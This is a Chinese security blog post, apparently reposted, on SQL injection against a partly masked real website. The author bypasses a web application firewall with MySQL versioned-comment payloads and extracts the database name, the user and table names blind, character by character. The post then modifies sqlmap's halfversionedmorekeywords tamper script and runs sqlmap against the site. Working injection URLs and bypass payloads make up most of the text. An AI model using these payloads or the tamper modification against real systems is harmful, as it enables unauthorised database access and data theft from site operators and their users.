Sqlmap 是python写的一个开源测试工具,因支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access 等多个份额较多的数据库,且功能强悍被众多安全测试者所使用,在现实的测试环境中,有很多测试者遇到注入都习惯使用Sqlmap去进行测试,假如 Sqlmap无法跑出来,就不进行深入测试了,本文笔者将拿一个真实遇到的小例子,给大家简单讲述下从手工绕过waf,到实现Sqlmap自动测试的一个 过程 :-) 大牛就不用看了
在测试某个项目的过程中,笔者正常浏览者页面,习惯性测试下搜索什么的,看下有没有xss或者其他类型的一些漏洞,在打开一个页面的时候,发现了一个aid的参数,习惯性的提交 and 1=1发现直接403了:
笔者测试了其他的一些参数,发现过滤了大部分的注入命令,但是可以利用mysql的注释方法进行绕过,例如网站会拦截sleep()函数,可以利用/*!50000sleep(5)*/绕过拦截,接上url试试:
http://**.com/lightapp/detail.php?qid=17364076 and /*!50000sleep(5)*/
发现会sleep几秒 :),看来是存在sql注入的,先获取下数据库的长度:
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=1
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=2
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=3
...
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=8
到8的时候网页返回正确,可以获取到当前的数据库长度为8,继续往下猜:
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/left(database(),8)=CHAR(115,105,116,101,100,97,116,97)
最终猜出的数据库名为:
sitedata
[email protected]
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/left(user(),23)=CHAR(109,121,115,113,108,95,100,97,116,97,64,
49,57,50,46,49,54,56,46,49,49,51,46,56)
查询当前数据库的第一个表名的长度可以使用语句:
http://**.com/lightapp/detail.php?qid=17364076/*!and*/length((select/*!50000table_name*//*!from*//*!information_schema.tables*/limit+0,1))=13
得出第一个数据表名的长度为13,试查询第二个数据表的表名,使用语句:
http://**.com/lightapp/detail.php?qid=17364076/*!and*/left((select/*!50000table_name*//*!from*//*!information_schema.tables*/limit+1,1),1)=char(99)
使用上述语句得到表名第一个字符的ascii码,依次类推:
http://**.com/lightapp/detail.php?qid=17364076/*!and*/left((select/*!50000table_name*//*!from*//*!information_schema.tables*/limit+1,1),17)=char(99,108,105,101,110,116,95,117,115,101,114,110,97,109,101,100,98)
client_usernamedb
感觉写得有点标题党了 :) 其实这个没有什么难度,Sqlmap tamper目录下自带了很多脚本,很多测试者喜欢利用绕过waf,笔者翻temper目录看了一下,没有合适本次注入点的脚本:
笔者就利用halfversionedmorekeywords.py这个脚本做了下简单的修改,即可绕过上面的注入,看一下脚本中注释部分:
>>>tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,
97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0
CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
return match.group().replace(word, "/*!0%s" % word)
return match.group().replace(word, "/*!50000%s*/" % word)
<?xml version="1.0" encoding="UTF-8"?>
<root>
<!-- MySQL -->
<dbms value="MySQL">
<cast query="CAST(%s AS CHAR)"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
<delimiter query=","/>
<limit query="LIMIT %d,%d"/>
<cast query="convert(%s,CHAR)"/>
Python:Sqlmap源码精读之解析xml
http://www.cnblogs.com/hongfei/archive/2014/07/22/sqlmap-xml.html
改完后执行:
python sqlmap.py -u "http://**.com/lightapp/detail.php?qid=17364076" –tamper "halfversionedmorekeywords.py"
简单的总结下,Sqlmap tamper提供了很多的demo,我们可以根据实际情况进行相应的修改应用即可 :)
【原文:Sobug漏洞时间-Sqlmap小技巧 作者:Boom SP小编整理发布】